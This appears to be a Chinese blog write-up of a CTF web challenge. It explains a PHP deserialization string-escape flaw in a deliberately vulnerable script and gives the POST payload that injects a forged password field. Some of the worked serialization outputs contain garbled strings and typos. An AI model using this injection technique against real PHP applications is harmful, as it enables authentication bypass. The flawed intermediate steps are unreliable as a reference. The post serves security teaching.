中北大学第二届CTF的WEB模块第一题

最新推荐文章于 2024-07-16 10:29:53 发布
最新推荐文章于 2024-07-16 10:29:53 发布
阅读量668 收藏 11
点赞数 12
分类专栏: 笔记 文章标签: php 网络安全 unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44112065/article/details/117672559
版权

中北大学第二届CTF的WEB模块第一题

题目代码

<?php
    include_once 'flag.php';
    highlight_file(__FILE__);
    // Security filtering function
    function filter($str){
        return str_replace('secure', 'secured', $str);
    }
    class Hacker{
        public $username = 'margin';
        public $password = 'margin123';
    }
    $h = new Hacker();
    if (isset($_POST['username']) && isset($_POST['password'])){
        // Security filtering
        $h->username = $_POST['username'];
        $c = unserialize(filter(serialize($h)));
        if ($c->password === 'hacker'){
            echo $flag;
        }
    }

预备知识

  • isset():检测变量是否已设置并且非 null
  • string serialize ( mixed $value ):序列化函数,通过这个函数将多个键值对组合为一个字符串,有利于存储或者传递PHP值,示例如下:
<?php
$g = array('username' => 'gggxx' , 'password' => 'xxxmm');
 
//序列化数组
$s = serialize($g);
echo $s;
//输出结果:g:2:{s:8:"username";s:5:"gggxx";s:8:"password";s:5:"xxxmm";}
?>
  • str_replace(“world”,“W”,“Hello world!”):字符串替换函数,将Hello World中的word替换成W
  • unserialize():反序列化函数,相当于序列化函数的逆运算,根据序列化后的字符串求出PHP的键值

思考过程

  1. 首先看函数部分,也就是if函数,函数中每一步的作用我会在代码旁以注释的形式标明。
class Hacker{
        public $username = 'margin';
        public $password = 'margin123';
	}
	$h = new Hacker();//创建Hacker对象
if (isset($_POST['username']) && isset($_POST['password'])){//通过POST方式获取username与password对应的值($_POST['']),并且两个值都不为null(isset函数)
        // Security filtering
        $h->username = $_POST['username'];//将接收到的username值赋值给上面h的username
        $c = unserialize(filter(serialize($h)));//将h依次进行进行序列化、字符串替换、以及反序列化等操作,并将反序列化后的PHP值赋给c。注意:这里的h相当于接收到的username
        if ($c->password === 'hacker'){
            echo $flag;//如果c的password值等于'hacker',那么就输出flag值
        }
    }
  • 通过上面对代码的讲解就可以得知,最后判断是否输出flag,依靠的是c的password值,c是由h经过序列化、字符串替换、反序列化三个操作得出的,而h是由我们传的username值得到的。
  • 也就是username–>h.username–>c–>password,所以我们可以得出结论,1.flag的输出与我们传入的password的值无关,只与传的username有关,但是password必须为非空 2.c的password值是由我们传入的username中得到的
  1. 接下来就是看怎么将password的值放入username的值中了,因为h经过了序列化、字符串替换以及反序列化操作,所以这里想到了PHP的反序列化溢出。序列化结果的格式如下:
//序列化结果格式:{s:字符串长度:字符串;s:字符串长度:字符串;}
h:2:{s:8:"username";s:5:"gggxx";s:8:"password";s:5:"xxxmm";}

序列化中的字符串长度是多长,反序列化时它就会将多长的字符串取出,结合代码中的字符串替换函数,替换函数中每次将secure替换成了secured,也就是每次替换字符串的长度增加了1,序列化后字符串的长度进行增加。所以原本应该被username取到的部分字符串就会出现没有被username取到的情况,我们可以将溢出的部分字符串变为已经设置好的序列化后的password,然后反序列化时自然而然地会将我们加入都password赋值给c,这时就会出现password。代码如下:

POST请求中:username=securesecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecure";s:8:"password";s:6:"hacker";}&password=yyyy

需要反序列化的为变量h,也就是:username=securesecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecure";s:8:"password";s:6:"hacker";}&password=margin123(h的初始密码)

//我们需要将";s:8:"password";s:6:"hacker";}加入到username中,这部分为需要溢出的字符串,一共为31位,所以我们需要在前面添加31位secure,这样在反序列化时会自动加上password=hacker,&后的password的值任意。

一步步解析:
假设"securesecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecure";s:8:"password";s:6:"hacker";}"这段字符串的长度为len
1.序列化结果:
{s:8:"username";s:len:"securesecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecure";s:8:"password";s:6:"hacker";}";s:8:"passsword";s:8:"margin123"}

2.字符串替换(执行filter()函数)后的结果:
字符串变成了:"securedsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuresedcuresedcuresedcuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuresedcuresedcuredsecured";s:8:"password";s:6:"hacker";}"长度为len+31,31为";s:8:"password";s:6:"hacker";}的长度
序列化结果变为:
{s:8:"username";s:len:"securedsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuresedcuresedcuresedcuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuresedcuresedcuredsecured";s:8:"password";s:6:"hacker";};s:8,"password";s:8:"margin123";}
3.反序列化结果:
由于hacker后有一个},所以只看}前面的内容,也就是username="securedsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuresedcuresedcuresedcuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuresedcuresedcuredsecured" password=hacker

这里password与hacker成功地进行了注入,他们都是传入的username得到的,但是也有了password,所以可以反序列化赋值给c

赛后总结

总而言之就是通过secure字符串的替换,使得序列化中username的实际长度变长,占用了原有的部分字符串的位置,而这些字符串可以自己构造成password,从而反序列化读出。

附一张得到flag的截图:
在这里插入图片描述

大槐TuT
关注
  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
【DASCTF中北大学】EasyUnser PHP反序列化字符串逃逸
_Kisaragi_的博客
06-07 303
目 <?php include_once 'flag.php'; highlight_file(__FILE__); // Security filtering function function filter($str){ return str_replace('secure', 'secured', $str); } class Hacker{ public $username = 'margin';
利用文件名进行GetShell---CTF目的相关知识解析
rigous的博客
11-27 3727
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的目,包括一道php登录绕过和命令执行漏洞,整个解思路一波三折,很有意思。
2016 ISCC CTF 比赛 WEB第一
aj_shang的博客
06-06 3514
网站链接:http://101.200.145.44/web1/index.php.txt 当点击这里之后,后出现下图 1.点击source,出现源码,发现user==flag 2.注入sql语句 $sql = "select user from user where pw= ' $pass ' " 在密码栏中输入的值是$pass,将其替换为' or us
CTF wed安全(攻防世界)练习_ctfweb
最新发布
2401_85773496的博客
07-16 567
phps 文件就是 php 的源代码文件,通常用于提供给用户(访问者)查看 php 代码,因为用 户无法直接通过 Web 浏览器看到 php 文件的来内容,所以需要用 phps 文件代替。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
第二届BJDCTF WEB 部分目简要
a3320315的博客
03-26 316
文件探测File Detect 这个目主要的考点为: php字符串格式化漏洞 SSRF CBC逃逸 针对第一个考点 我们只需要在前拼接的字符串中加入%s%就可以了,这样最后面的%就会将代码中的%d吞掉 针对第二个考点 没啥好说的,就是一个file_get_contents读取本地文件 针对第三个考点 这个以前在XCTF做过类似的目 这儿的密匙使用SESSION来储存的,所以我们只需要...
ctf-web:文件上传漏洞和文件解析漏洞
热门推荐
薯片薯条的博客
10-11 9万+
这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍. 其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么… 当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了. 先说说这两个漏洞的区别. 一.文件上传漏洞 这个漏洞产生的原因是因为上传文件的不严谨所产生的.比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将.
2021CTF工业信息安全大赛第一.rar
09-19
【标】"2021CTF工业信息安全大赛第一.rar" 提供的信息表明,这是一个与2021年工业信息安全领域的CTF(Capture The Flag)比赛相关的压缩包文件,其中包含了第一场比赛的试CTF比赛通常涉及网络安全、密码学...
002-CTF web理论基础篇-第二课理论基础.pdf
07-09
CTF(Capture The Flag)是一种网络安全竞赛,其中的Web目主要涉及Web安全领域的知识和技巧。本篇将深入探讨CTF Web型的基础理论,帮助参赛者理解和掌握解的关键点。 1. 工具集: 在CTF Web挑战中,通常会...
第二届赣网杯WEB第一WP.docx
12-06
第二届赣网杯WEB第一】是一场网络安全竞赛中的Web挑战赛目,主要涉及CTF(Capture The Flag)领域的知识。此目的核心是通过解决一个连连看游戏来获取隐藏的FLAG,以此来检验参赛者的Web安全技能和逆向工程...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛中,Web⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web⽬常见的漏洞类型...
TQLCTF两道-向html插入webshell和DNS缓存污染
unexpectedthing的博客
03-25 3923
文章目录Simple PHP考点wpNetworkTools--学习DNS缓存攻击DNS解析链DNS缓存攻击及利用方式考点wp Simple PHP 考点 任意文件读取,获取源代码 读取源代码后,向html文档里插入webshell 无字母构造webshell wp 开始想着在登录注册界面去SQL注入,但是本的目的不是为了拿数据库 我们自己注册登录进去后 点好康的,抓包,发现有个任意文件读取漏洞 读取get_pic.php <?php error_reporting(0); $image =
[GYCTF2020]Easyphp
feng的博客
03-08 1943
前言 知识点: www.zip源码泄露 PHP反序列化链POC 代码审计 WP 进入环境,目是easyphp我就感觉要审源码。。。试了一下常见的泄露,发现存在www.zip。把代码下载下来进行一下审计,发现update.php和lib.php可以利用: <?php session_start(); function safe($parm){ $array= array('union','regexp','load','into','flag','file','insert',"'",'\
记录第一ctf比赛
姜小孩的博客
10-11 1226
第一关是在根据目提示是在F12里一开始漫无目的的寻找,回头再看看的时候发现他有提示:看到这都还没找到,有点蠢……然后便往回找,最终找到,第一看来是给出的礼物hhhhhhhh 第二关是目提示是菜刀,但是习惯用蚁剑的我便开始了我的蚁剑之旅,点开环境大大的写着密码是wllm,我非常不好意思的直接连接,找到了flag第二关结束 第三关的目提示是基操,给我看的蒙蒙的,点开环境仔细读代码原来是让post传id=wllm然后get传json其中json需要用json格式,代码如下: <?php h
shutTD的CTF之旅WEB篇(1)--某个DASCTF
shutTD的博客
09-26 899
某个不知道源头的DASCTF个人wp
CTFWEB基础篇
Innocence_0的博客
03-15 1828
简介JavaScript 是互联网上最流行的脚本语言,这门语言可用于 HTML 和 web,更可广泛用于服务器、PC、笔记本电脑、平板电脑和智能手机等设备。作用JavaScript 是脚本语言JavaScript 是一种轻量级的编程语言。JavaScript 是可插入 HTML 页面的编程代码。JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。JavaScript 很容易学习。
ctf web基本步骤
小小白的博客
06-27 3万+
大家做ctf简单点的都可以用这些判断,基本上都会有,除非个别变态的。 1. 看源码 可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2. 抓包 这几天接触到的抓包一般是用burpsuite,如果要多次尝试可以右键->【send t...
CTF入门之旅(三)
qinyuehong的博客
02-23 336
请使用微笑过关 目:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 打开地址可以看到这样的目界面,进一步打开其中的源代码。 include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;
NewStarCTF 公开赛赛道
shinygod的博客
10-06 1959
基础练习
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值